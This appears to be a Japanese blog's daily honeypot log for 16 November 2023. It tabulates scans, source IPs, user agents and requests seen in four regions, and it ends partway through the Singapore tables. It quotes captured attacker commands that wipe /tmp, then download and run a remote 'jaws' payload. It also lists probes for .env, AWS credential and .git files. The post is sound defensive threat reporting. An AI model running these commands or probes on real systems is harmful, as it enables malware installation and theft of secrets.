2023/11/16 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/11/16分です。

特徴

共通

CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

Spring Bootの脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
/.gitへのスキャン行為
configファイルへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  93.123.85.56/jaws;
sh /tmp/jaws

Location:UK

Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:SG

Drupalの脆弱性(CVE-2018-7600)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 167.71.210.63/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：219 (前日比：-720)
US：総アクセス数：163 (前日比：49)
UK：総アクセス数：116 (前日比：67)
SG：総アクセス数：169 (前日比：50)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.199.64.162	United States
2	23.92.29.11	United States
1	34.34.188.27	United States
1	35.92.10.32	United States
64	35.92.186.163	United States
2	36.33.43.77	China
1	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
45	59.4.55.162	South Korea
3	65.49.20.66	United States
2	78.153.140.219	Russia
45	80.90.189.67	Russia
14	101.32.192.203	Singapore
1	104.192.0.50	United States
1	107.170.192.30	United States
2	119.203.109.25	South Korea
5	135.125.244.48	France
4	135.125.246.189	France
1	142.147.99.226	Canada
1	157.245.4.84	United States
1	159.203.224.9	United States
1	162.243.139.15	United States
2	165.227.47.218	United States
2	172.104.11.46	United States
1	172.105.128.13	United States
2	185.100.87.136	Seychelles
2	185.254.196.173	Ukraine
5	185.254.196.186	Ukraine
1	192.241.215.38	United States
1	192.241.216.43	United States
1	199.45.154.17	United States
2	205.210.31.150	United States

UserAgent一覧

件数	UserAgent
103	`-`
1	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
14	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
83	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`
1	`Python-urllib/3.10`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
7		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.project`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/PHPConf.php`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin/phpinfo.php`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/cms/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
2	GET	`/docker/.env`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/enviroments/.env.production`	HTTP/1.1
1	GET	`/enviroments/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/info/info.php`	HTTP/1.1
1	GET	`/info/phpinfo.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/information.php`	HTTP/1.1
1	GET	`/information`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/live_env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/p.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpinformation`	HTTP/1.1
1	GET	`/phptest.php`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/scripts/phpinfo.php`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/sources/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/testphpinfo.php`	HTTP/1.1
1	GET	`/testphpinfo`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/viewinfo.php`	HTTP/1.1
1	GET	`/webdav/info.php`	HTTP/1.1
1	GET	`/webdav/phpinfo.php`	HTTP/1.1
1	GET	`/webdav/phpinfo`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
3	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
4	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
3	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
14	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	34.38.101.231	United States
7	35.216.223.217	United States
1	45.33.80.243	United States
1	45.56.86.210	United States
2	45.79.172.21	United States
1	47.103.142.68	China
7	54.36.115.221	France
1	54.37.79.75	France
36	57.129.23.166	France
1	64.62.197.239	United States
2	64.227.150.86	United States
3	65.49.20.68	United States
1	71.6.134.231	United States
2	78.153.140.219	Russia
1	80.66.88.204	Russia
2	83.97.73.87	Germany
8	95.214.235.169	Ukraine
2	104.200.18.211	United States
1	125.168.139.31	Australia
1	139.59.101.104	Singapore
2	162.142.125.216	United States
2	162.142.125.220	United States
2	162.142.125.221	United States
1	162.243.144.31	United States
1	162.243.147.25	United States
50	165.232.175.128	United States
2	167.94.138.126	United States
2	167.94.145.55	United States
1	167.172.241.177	United States
1	172.104.11.4	United States
3	172.104.11.51	United States
4	172.105.128.13	United States
1	188.215.235.122	Romania
1	192.155.90.118	United States
1	192.241.195.114	United States
1	192.241.238.27	United States
1	193.35.18.187	Bulgaria
2	198.235.24.133	United States
2	199.45.154.51	United States
2	205.210.31.31	United States

UserAgent一覧

件数	UserAgent
30	`-`
1	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
53	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
6	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
55	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
20		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
55	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/adept`	HTTP/1.1
1	GET	`/adetp`	HTTP/1.1
1	GET	`/archno`	HTTP/1.1
1	GET	`/archon`	HTTP/1.1
1	GET	`/banshee`	HTTP/1.1
1	GET	`/battlecruiser`	HTTP/1.1
1	GET	`/battlecruisre`	HTTP/1.1
1	GET	`/carrier`	HTTP/1.1
1	GET	`/carrire`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/colosssu`	HTTP/1.1
1	GET	`/colossus`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/darktemplar`	HTTP/1.1
1	GET	`/darktemplra`	HTTP/1.1
1	GET	`/disruptor`	HTTP/1.1
1	GET	`/disruptro`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/ghost`	HTTP/1.1
1	GET	`/ghots`	HTTP/1.1
1	GET	`/hellino`	HTTP/1.1
1	GET	`/hellion`	HTTP/1.1
1	GET	`/hightemplar`	HTTP/1.1
1	GET	`/hightemplra`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/immortal`	HTTP/1.1
1	GET	`/immortla`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/marauder`	HTTP/1.1
1	GET	`/maraudre`	HTTP/1.1
1	GET	`/marine`	HTTP/1.1
1	GET	`/mothership`	HTTP/1.1
1	GET	`/mothershipcoer`	HTTP/1.1
1	GET	`/mothershipcore`	HTTP/1.1
1	GET	`/mothershpi`	HTTP/1.1
1	GET	`/observer`	HTTP/1.1
1	GET	`/observre`	HTTP/1.1
1	GET	`/oracel`	HTTP/1.1
1	GET	`/oracle`	HTTP/1.1
1	GET	`/phoenix`	HTTP/1.1
1	GET	`/phoenxi`	HTTP/1.1
1	GET	`/probe`	HTTP/1.1
1	GET	`/proeb`	HTTP/1.1
1	GET	`/sentry`	HTTP/1.1
1	GET	`/sentyr`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.56/jaws;sh+/tmp/jaws`
1	GET	`/stalker`	HTTP/1.1
1	GET	`/stalkre`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/tempest`	HTTP/1.1
1	GET	`/tempets`	HTTP/1.1
1	GET	`/voidray`	HTTP/1.1
1	GET	`/voidrya`	HTTP/1.1
1	GET	`/warpprims`	HTTP/1.1
1	GET	`/warpprism`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/zealot`	HTTP/1.1
1	GET	`/zealto`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
6	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.206.213	Russia
1	5.188.210.227	Russia
1	35.241.220.39	United States
1	45.55.0.31	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.179	United States
1	51.159.99.244	France
12	54.37.79.75	France
10	59.2.248.84	South Korea
1	65.49.20.66	United States
3	65.49.20.68	United States
1	71.6.134.230	United States
2	78.153.140.219	Russia
1	83.97.73.87	Germany
8	95.214.235.169	Ukraine
1	103.149.26.234	Hong Kong
2	138.197.15.3	United States
1	139.59.101.104	Singapore
1	146.70.98.39	Romania
2	162.142.125.12	United States
1	162.243.130.25	United States
1	162.243.142.64	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
2	178.128.79.160	United States
1	192.99.9.171	Canada
1	192.155.90.118	United States
2	192.155.90.220	United States
1	192.241.210.81	United States
1	198.199.111.177	United States
2	198.235.24.235	United States
2	205.210.31.134	United States
45	220.93.167.144	South Korea

UserAgent一覧

件数	UserAgent
75	`-`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
21	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
1	`curl/7.81.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`SSH-2.0-libssh2_1.10.0`
1		`\x16\x03\x01\x01H\x01`
16		`\x16\x03\x01`
22	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
2	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	5.196.102.74	France
1	5.196.102.75	France
1	20.25.162.194	United States
1	34.76.19.128	United States
3	36.156.22.2	China
2	45.33.80.243	United States
1	45.56.86.210	United States
1	45.56.108.128	United States
2	45.79.128.205	United States
2	45.79.153.192	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
10	54.37.79.75	France
37	57.129.23.166	France
1	61.93.218.229	Hong Kong
1	65.49.1.10	United States
1	65.49.1.16	United States
1	65.49.1.20	United States
1	66.240.192.82	United States
1	74.82.47.3	United States
2	78.153.140.219	Russia
1	83.97.73.87	Germany
1	89.248.165.95	United Kingdom
1	94.228.169.182	Russia
8	95.214.235.169	Ukraine
1	104.236.128.34	United States
1	107.170.241.18	United States
1	107.170.252.45	United States
45	111.91.178.253	South Korea
8	132.145.39.16	United States
4	152.32.197.121	Hong Kong
2	162.142.125.217	United States
1	162.243.133.45	United States
1	162.243.142.34	United States
2	165.22.47.52	United States
1	172.104.11.34	United States
2	172.104.11.46	United States
3	172.190.110.196	United States
1	175.107.0.204	Pakistan
1	177.53.84.98	Brazil
3	192.155.90.220	United States
2	205.210.31.26	United States
2	205.210.31.81	United States
4	207.90.244.5	United States

UserAgent一覧

件数	UserAgent
82	`-`
1	`Hello, world`
1	`Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)`
